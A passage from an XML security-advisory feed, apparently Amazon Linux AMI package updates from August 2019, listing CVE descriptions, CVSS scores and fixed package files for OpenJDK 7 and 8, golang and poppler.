Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: RMI). Supported versions that are affected are Java SE: 7u211, 8u202, 11.0.2 and 12; Java SE Embedded: 8u201. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 5.9 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N).
1700564:
CVE-2019-2684 OpenJDK: Incorrect skeleton selection in RMI registry server-side dispatch handling (RMI, 8218453)
CVE-2019-2602:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Libraries). Supported versions that are affected are Java SE: 7u211, 8u202, 11.0.2 and 12; Java SE Embedded: 8u201. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Java SE, Java SE Embedded. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).
1700440:
CVE-2019-2602 OpenJDK: Slow conversion of BigDecimal to long (Libraries, 8211936)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2602" title="" id="CVE-2019-2602" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2684" title="" id="CVE-2019-2684" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2698" title="" id="CVE-2019-2698" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk" version="1.8.0.212.b04" release="0.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.212.b04-0.45.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.212.b04" release="0.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.212.b04-0.45.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.212.b04" release="0.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.212.b04-0.45.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.212.b04" release="0.45.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.212.b04-0.45.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.212.b04" release="0.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.212.b04-0.45.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.212.b04" release="0.45.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.212.b04-0.45.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.212.b04" release="0.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.212.b04-0.45.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.212.b04" release="0.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.212.b04-0.45.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.212.b04" release="0.45.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.212.b04-0.45.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.212.b04" release="0.45.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.212.b04-0.45.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.212.b04" release="0.45.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.212.b04-0.45.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.212.b04" release="0.45.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.212.b04-0.45.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.212.b04" release="0.45.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.212.b04-0.45.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.212.b04" release="0.45.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.212.b04-0.45.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1268</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1268: medium priority package update for java-1.7.0-openjdk</title><issued date="2019-08-23 16:53:00" /><updated date="2019-08-26 22:19:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-2842:
Vulnerability in the Java SE component of Oracle Java SE (subcomponent: JCE). The supported version that is affected is Java SE: 8u212. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
1730110:
CVE-2019-2842 OpenJDK: Missing array bounds check in crypto providers (JCE, 8223511)
CVE-2019-2816:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Networking). Supported versions that are affected are Java SE: 7u221, 8u212, 11.0.3 and 12.0.1; Java SE Embedded: 8u211. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data as well as unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N).
1730099:
CVE-2019-2816 OpenJDK: Missing URL format validation (Networking, 8221518)
CVE-2019-2786:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Security). Supported versions that are affected are Java SE: 8u212, 11.0.3 and 12.0.1; Java SE Embedded: 8u211. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.4 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N).
1730255:
CVE-2019-2786 OpenJDK: Insufficient restriction of privileges in AccessController (Security, 8216381)
CVE-2019-2769:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Utilities). Supported versions that are affected are Java SE: 7u221, 8u212, 11.0.3 and 12.0.1; Java SE Embedded: 8u211. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1730056:
CVE-2019-2769 OpenJDK: Unbounded memory allocation during deserialization in Collections (Utilities, 8213432)
CVE-2019-2762:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Utilities). Supported versions that are affected are Java SE: 7u221, 8u212, 11.0.3 and 12.0.1; Java SE Embedded: 8u211. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1730415:
CVE-2019-2762 OpenJDK: Insufficient checks of suppressed exceptions in deserialization (Utilities, 8212328)
CVE-2019-2745:
Vulnerability in the Java SE component of Oracle Java SE (subcomponent: Security). Supported versions that are affected are Java SE: 7u221, 8u212 and 11.0.3. Difficult to exploit vulnerability allows unauthenticated attacker with logon to the infrastructure where Java SE executes to compromise Java SE. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 5.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N).
1730411:
CVE-2019-2745 OpenJDK: Side-channel attack risks in Elliptic Curve (EC) cryptography (Security, 8208698)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2745" title="" id="CVE-2019-2745" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2762" title="" id="CVE-2019-2762" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2769" title="" id="CVE-2019-2769" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2786" title="" id="CVE-2019-2786" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2816" title="" id="CVE-2019-2816" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2842" title="" id="CVE-2019-2842" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.231" release="2.6.19.1.80.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.231-2.6.19.1.80.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.231" release="2.6.19.1.80.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.231-2.6.19.1.80.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.231" release="2.6.19.1.80.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.231-2.6.19.1.80.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.231" release="2.6.19.1.80.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.231-2.6.19.1.80.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.231" release="2.6.19.1.80.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.231-2.6.19.1.80.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.231" release="2.6.19.1.80.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.231-2.6.19.1.80.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.231" release="2.6.19.1.80.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.231-2.6.19.1.80.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.231" release="2.6.19.1.80.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.231-2.6.19.1.80.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.231" release="2.6.19.1.80.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.231-2.6.19.1.80.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.231" release="2.6.19.1.80.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.231-2.6.19.1.80.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.231" release="2.6.19.1.80.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.231-2.6.19.1.80.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1269</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1269: medium priority package update for java-1.8.0-openjdk</title><issued date="2019-08-23 16:55:00" /><updated date="2019-08-26 22:20:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-2842:
Vulnerability in the Java SE component of Oracle Java SE (subcomponent: JCE). The supported version that is affected is Java SE: 8u212. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
1730110:
CVE-2019-2842 OpenJDK: Missing array bounds check in crypto providers (JCE, 8223511)
CVE-2019-2816:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Networking). Supported versions that are affected are Java SE: 7u221, 8u212, 11.0.3 and 12.0.1; Java SE Embedded: 8u211. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data as well as unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N).
1730099:
CVE-2019-2816 OpenJDK: Missing URL format validation (Networking, 8221518)
CVE-2019-2786:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Security). Supported versions that are affected are Java SE: 8u212, 11.0.3 and 12.0.1; Java SE Embedded: 8u211. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.4 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N).
1730255:
CVE-2019-2786 OpenJDK: Insufficient restriction of privileges in AccessController (Security, 8216381)
CVE-2019-2769:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Utilities). Supported versions that are affected are Java SE: 7u221, 8u212, 11.0.3 and 12.0.1; Java SE Embedded: 8u211. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1730056:
CVE-2019-2769 OpenJDK: Unbounded memory allocation during deserialization in Collections (Utilities, 8213432)
CVE-2019-2762:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Utilities). Supported versions that are affected are Java SE: 7u221, 8u212, 11.0.3 and 12.0.1; Java SE Embedded: 8u211. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1730415:
CVE-2019-2762 OpenJDK: Insufficient checks of suppressed exceptions in deserialization (Utilities, 8212328)
CVE-2019-2745:
Vulnerability in the Java SE component of Oracle Java SE (subcomponent: Security). Supported versions that are affected are Java SE: 7u221, 8u212 and 11.0.3. Difficult to exploit vulnerability allows unauthenticated attacker with logon to the infrastructure where Java SE executes to compromise Java SE. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 5.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N).
1730411:
CVE-2019-2745 OpenJDK: Side-channel attack risks in Elliptic Curve (EC) cryptography (Security, 8208698)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2745" title="" id="CVE-2019-2745" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2762" title="" id="CVE-2019-2762" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2769" title="" id="CVE-2019-2769" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2786" title="" id="CVE-2019-2786" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2816" title="" id="CVE-2019-2816" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2842" title="" id="CVE-2019-2842" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk" version="1.8.0.222.b10" release="0.47.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.222.b10-0.47.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.222.b10" release="0.47.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.222.b10-0.47.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.222.b10" release="0.47.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.222.b10-0.47.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.222.b10" release="0.47.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.222.b10-0.47.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.222.b10" release="0.47.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.222.b10-0.47.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.222.b10" release="0.47.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.222.b10-0.47.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.222.b10" release="0.47.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.222.b10-0.47.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.222.b10" release="0.47.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.222.b10-0.47.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.222.b10" release="0.47.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.222.b10-0.47.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.222.b10" release="0.47.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.222.b10-0.47.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.222.b10" release="0.47.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.222.b10-0.47.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.222.b10" release="0.47.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.222.b10-0.47.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.222.b10" release="0.47.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.222.b10-0.47.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.222.b10" release="0.47.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.222.b10-0.47.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1270</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1270: important priority package update for golang</title><issued date="2019-08-23 16:58:00" /><updated date="2019-10-02 23:03:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9514:
Some HTTP/2 implementations are vulnerable to a reset flood, potentially leading to a denial of service. The attacker opens a number of streams and sends an invalid request over each stream that should solicit a stream of RST_STREAM frames from the peer. Depending on how the peer queues the RST_STREAM frames, this can consume excess memory, CPU, or both.
1735744:
CVE-2019-9514 HTTP/2: flood using HEADERS frames results in unbounded memory growth
CVE-2019-9512:
Some HTTP/2 implementations are vulnerable to ping floods, potentially leading to a denial of service. The attacker sends continual pings to an HTTP/2 peer, causing the peer to build an internal queue of responses. Depending on how efficiently this data is queued, this can consume excess CPU, memory, or both.
1735645:
CVE-2019-9512 HTTP/2: flood using PING frames results in unbounded memory growth
CVE-2019-14809:
net/url in Go before 1.11.13 and 1.12.x before 1.12.8 mishandles malformed hosts in URLs, leading to an authorization bypass in some applications. This is related to a Host field with a suffix appearing in neither Hostname() nor Port(), and is related to a non-numeric port number. For example, an attacker can compose a crafted javascript:// URL that results in a hostname of google.com.
1743129:
CVE-2019-14809 golang: malformed hosts in URLs leads to authorization bypass
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14809" title="" id="CVE-2019-14809" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9512" title="" id="CVE-2019-9512" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9514" title="" id="CVE-2019-9514" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-race" version="1.12.8" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.12.8-1.51.amzn1.x86_64.rpm</filename></package><package name="golang-src" version="1.12.8" release="1.51.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.12.8-1.51.amzn1.noarch.rpm</filename></package><package name="golang-tests" version="1.12.8" release="1.51.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.12.8-1.51.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.12.8" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.12.8-1.51.amzn1.x86_64.rpm</filename></package><package name="golang-docs" version="1.12.8" release="1.51.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.12.8-1.51.amzn1.noarch.rpm</filename></package><package name="golang-misc" version="1.12.8" release="1.51.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.12.8-1.51.amzn1.noarch.rpm</filename></package><package name="golang" version="1.12.8" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.12.8-1.51.amzn1.x86_64.rpm</filename></package><package name="golang" version="1.12.8" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.12.8-1.51.amzn1.i686.rpm</filename></package><package name="golang-bin" version="1.12.8" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.12.8-1.51.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1271</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1271: medium priority package update for poppler</title><issued date="2019-08-23 17:01:00" /><updated date="2019-08-26 22:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9631:
Poppler 0.74.0 has a heap-based buffer over-read in the CairoRescaleBox.cc downsample_row_box_filter function.
1686802:
CVE-2019-9631 poppler: heap-based buffer over-read in function downsample_row_box_filter in CairoRescaleBox.cc
CVE-2019-9200:
A heap-based buffer underwrite exists in ImageStream::getLine() located at Stream.cc in Poppler 0.74.0 that can (for example) be triggered by sending a crafted PDF file to the pdfimages binary. It allows an attacker to cause Denial of Service (Segmentation fault) or possibly have unspecified other impact.
1683632:
CVE-2019-9200 poppler: heap-based buffer overflow in function ImageStream::getLine() in Stream.cc
CVE-2019-7310:
In Poppler 0.73.0, a heap-based buffer over-read (due to an integer signedness error in the XRef::getEntry function in XRef.cc) allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a crafted PDF document, as demonstrated by pdftocairo.
1672419:
CVE-2019-7310 poppler: heap-based buffer over-read in XRef::getEntry in XRef.cc
CVE-2018-20662:
